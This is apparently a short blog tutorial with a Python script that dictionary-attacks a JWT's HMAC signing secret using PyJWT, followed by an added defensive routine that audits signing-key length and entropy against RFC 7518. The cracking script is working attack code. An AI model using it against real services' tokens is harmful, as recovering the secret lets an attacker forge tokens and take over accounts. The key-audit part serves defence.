Preface
Brute-forcing the JWT signing secret
Download the project
```
git clone https://github.com/Feiju12138/crack_jwt_signature_secret.git
cd crack_jwt_signature_secret
```
Source code
```python
import sys

import jwt  # PyJWT

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("Usage: python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256")
        sys.exit(1)

    dict_path = sys.argv[1]
    token = sys.argv[2]
    algorithm = sys.argv[3]

    # PyJWT validates claims only after the signature has verified, so these
    # errors also mean the candidate secret is the right one.
    claim_errors = (jwt.exceptions.ExpiredSignatureError,
                    jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError,
                    jwt.exceptions.ImmatureSignatureError)

    found = None
    with open(dict_path) as f:
        for line in f:
            secret = line.strip()
            if not secret:
                continue  # skip blank lines in the wordlist
            try:
                jwt.decode(token, key=secret, algorithms=[algorithm])
            except jwt.exceptions.InvalidSignatureError:
                continue  # wrong secret, try the next candidate
            except claim_errors:
                pass  # signature matched; only a claim check failed
            except Exception as e:
                print(f"err: {e}")
                break
            found = secret
            break

    if found is not None:
        print(f"found success: {found}")
    else:
        print("found failed")
```
Install dependencies
Brute force
dict.txt: the wordlist to use
xxx.xxx.xxx: the JWT
HS256: the signing algorithm
```
python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256
```
Done
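The dictionary attack above only succeeds when the HMAC signing key is short or guessable. The following added example (not part of the original post or of the crack_jwt_signature_secret project) audits a service's own signing key before deployment. The function names, the character-class entropy bound and the sample values are assumptions of this example; the minimum key sizes follow RFC 7518 section 3.2.

```python
import math
import secrets
import string

# RFC 7518 section 3.2: an HMAC key must be at least as long as the hash output.
MIN_KEY_BYTES = {"HS256": 32, "HS384": 48, "HS512": 64}

# Character classes for the entropy upper bound: (members, alphabet size).
_CLASSES = [
    (string.digits.encode(), 10),
    (string.ascii_lowercase.encode(), 26),
    (string.ascii_uppercase.encode(), 26),
    ((string.punctuation + " ").encode(), 33),
]


def generate_secret(alg="HS256"):
    """Return raw random bytes of the minimum size allowed for alg."""
    return secrets.token_bytes(MIN_KEY_BYTES[alg])


def entropy_upper_bound(secret):
    """Upper bound in bits: length * log2(size of the alphabet in use)."""
    if not secret:
        return 0.0
    known = b"".join(chars for chars, _ in _CLASSES)
    if any(b not in known for b in secret):
        pool = 256  # arbitrary bytes, not just printable ASCII
    else:
        pool = sum(n for chars, n in _CLASSES if any(b in chars for b in secret))
    return len(secret) * math.log2(pool)


def audit_secret(secret, alg="HS256", wordlist=()):
    """Return findings for an HMAC signing key; an empty list means none."""
    findings = []
    need = MIN_KEY_BYTES[alg]
    if len(secret) < need:
        findings.append(f"too short: {len(secret)} bytes, {alg} needs {need}")
    # Check against the same kind of dictionary the cracking script reads.
    words = {w.strip().encode() for w in wordlist if w.strip()}
    if secret in words:
        findings.append("listed in wordlist")
    bits = entropy_upper_bound(secret)
    if bits < need * 8:  # threshold chosen for this example
        findings.append(f"entropy at most {bits:.0f} bits, want {need * 8}")
    return findings
```

A 32-character hex string passes the length check but is still flagged, because its alphabet caps it at roughly 165 bits; use the raw bytes from `generate_secret` as the key instead.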
References
Bilibili: 逆风微笑的代码狗
CSDN: 1024小神